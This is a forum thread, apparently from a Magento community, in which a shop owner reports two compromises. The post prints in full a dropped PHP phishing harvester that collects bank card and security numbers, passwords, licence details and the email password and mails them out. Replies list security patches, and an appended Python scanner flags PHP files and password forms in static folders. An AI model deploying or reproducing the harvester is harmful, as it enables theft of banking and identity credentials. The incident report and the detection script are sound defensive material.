
How easy to hack Magento



Hello Friends,

I am using Magento over HTTP and my domain has been hacked twice. The first time, the hackers used Media and JS to install a module for an additional login.html. I then cleared all offending content from the server and changed the admin passwords too, but my domain got hacked again, and this time they used downloader>skin>install to upload the file pud.php

Here is the detailed code of that file:


$sec = $_REQUEST['password'];
$page_name= "Stgeorge";

if(isset($sec)) {
		$ip = getenv("REMOTE_ADDR");
		$message .= "---------- Login Information ----------------------------\n";
		$message .= "Card/Access Number: ".$_POST['firstname']."\n";
		$message .= "Security Number: ".$_POST['password']."\n";
		$message .= "Internet Password: ".$_POST['passwords']."\n";
		$message .= "---------- Identity Information ----------------------------\n";
		$message .= "Full Name : ".$_POST['fn']."\n";
		$message .= "Verbal Password : ".$_POST['vb']."\n";
		$message .= "DOB: ".$_POST['dobday']." - ".$_POST['dobmonth']." - ".$_POST['dobyear']."\n";
		$message .= "10-Digit Licence Card Number: ".$_POST['dln']."\n";
		$message .= "Driver's licence number: ".$_POST['dlnssss']."\n";
		$message .= "Licence Expiry Date: ".$_POST['edobday']." - ".$_POST['edobmonth']." - ".$_POST['edobyear']."\n";
		$message .= "---------- Contact Information and Home Address ----------------------------\n";
		$message .= "Mobile Number: ".$_POST['mn']."\n";
		$message .= "Home Phone Number: ".$_POST['pn']."\n";
		$message .= "E-mail Address: ".$_POST['email']."\n";		
		$message .= "E-mail Pass: ".$_POST['emailp']."\n";		
		$message .= "IP: ".$ip."\n";
		$message .= "----------------Created By shika------------------\n";
		$send = ",";
		$subject = $page_name." - ReZulTs";
		$headers = "From: <>";
		$headers .= $_POST['eMailAdd']."\n";
		$headers .= "MIME-Version: 1.0\n";
		mail("$send", "$subject", $message); 

else {



Finally, I think about how easy it is to hack Magento

Now, I need help to stop this hacking sequence and for that please tell me all available processes and available security patches for



Re: How easy to hack Magento

Hi @Arbit17,


The list of patches for that version of Magento is:


  • SUPEE-10266: SUPEE-10266 for CE (0.04 MB)
  • SUPEE-10336: SUPEE-10336 for CE and earlier (0.01 MB)
  • SUPEE-1533: SUPEE-1533 - Magento-CE-v1.8.x-1.9.x (0.01 MB)
  • SUPEE-1868: Magento-CE-v1.8.x (0.01 MB)
  • APPSEC-212: Magento-CE-v1.8.0.0- (0.01 MB)
  • SUPEE-2725: Magento-CE-v1.7.0.0- (0.01 MB)
  • SUPEE-3941: Magento-CE-v1.8.0.0- (0.03 MB)
  • SUPEE-4291/4334: Magento-CE-v1.7.x-1.8.x (0.01 MB)
  • SUPEE-5344: SUPEE-5344 - Magento-CE-v1.8.x-1.9.x (0.01 MB)
  • SUPEE-5994: SUPEE-5994 for CE - (0.04 MB)
  • SUPEE-6237: USPS API Patch - SUPEE-6237 - CE 1.6.x-1.9.1.x (0.01 MB)
  • SUPEE-6285: SUPEE-6285 for CE (0.05 MB)
  • SUPEE-6482: SUPEE-6482 for CE 1.7.x - (0.01 MB)
  • SUPEE-6788: SUPEE-6788 for CE (0.17 MB)
  • SUPEE-7405: SUPEE-7405 for CE (0.11 MB)
  • SUPEE-7405 v1.1: SUPEE-7405 v1.1 for CE (0.01 MB)
  • SUPEE-7616: SUPEE-7616 for CE - (0.01 MB)
  • SUPEE-8167: SUPEE-8167 for CE (0.01 MB)
  • SUPEE-8788: SUPEE-8788 for CE (0.63 MB)
  • SUPEE-8967: SUPEE-8967 for CE (0.01 MB)
  • SUPEE-9652: SUPEE-9652 for CE (0.01 MB)
  • SUPEE-9767: SUPEE-9767 for CE (0.08 MB)
  • SUPEE-9767 v2: SUPEE-9767v2 for CE (0.06 MB)
  • PHP 5.4: Magento-CE-v1.8.0.0 (0.01 MB)


You can use this tool as help:


If you've found one of my answers useful, please give "Kudos" or "Accept as Solution"

Re: How easy to hack Magento

Magento just launched its own security scan tool - . Sign up for it; it is free. It will tell you not only what patches you need to install but also warn you about other vulnerabilities you might have.
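
A triage pass for the two drops described in the first post (the form-to-mail pud.php under downloader/skin and the extra login.html), as an added example that is not part of the thread or of any Magento tooling. It assumes a stock Magento 1 directory layout; the function names, reason labels and sample tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Static-asset directories of a Magento 1 tree (assumption: stock layout).
STATIC_DIRS = ("media", "js", "skin", "downloader/skin")
PHP_EXT = {".php", ".phtml", ".php5", ".phar"}
# Traits of the mailer quoted in the first post and of a planted login page.
READS_FORM = re.compile(rb"\$_(POST|REQUEST)\s*\[")
SENDS_MAIL = re.compile(rb"\bmail\s*\(")
PASSWORD_FIELD = re.compile(rb"<input[^>]+type=[\"']?password", re.I)

def classify(path):
    """Return the reasons a file under a static directory needs review."""
    reasons = ["php-in-static-dir"] if path.suffix.lower() in PHP_EXT else []
    try:
        data = path.read_bytes()
    except OSError:
        return reasons + ["unreadable"]
    if READS_FORM.search(data) and SENDS_MAIL.search(data):
        reasons.append("form-fields-to-mail")
    if PASSWORD_FIELD.search(data):
        reasons.append("password-form")
    return reasons

def scan(magento_root):
    """Walk the static directories; return {relative_path: reasons}."""
    root, findings = Path(magento_root), {}
    for sub in STATIC_DIRS:
        for path in sorted((root / sub).rglob("*")):
            reasons = classify(path) if path.is_file() else []
            if reasons:
                findings[path.relative_to(root).as_posix()] = reasons
    return findings

def make_sample(root):
    samples = {  # constructed sample tree: dropper, planted form, benign file
        "downloader/skin/install/pud.php": b"<?php mail($to, $s, $_POST['fn']);",
        "media/login.html": b"<form><input name=p type='password'></form>",
        "skin/frontend/site.css": b"body { margin: 0 }",
    }
    for rel, body in samples.items():
        Path(root, rel).parent.mkdir(parents=True, exist_ok=True)
        Path(root, rel).write_bytes(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        make_sample(tmp)
        print("\n".join(f"{p}: {r}" for p, r in scan(tmp).items()))
```

A hit is a lead for manual comparison against a clean copy of the same release, not a verdict; run `scan()` against the web root of the store and review each flagged path.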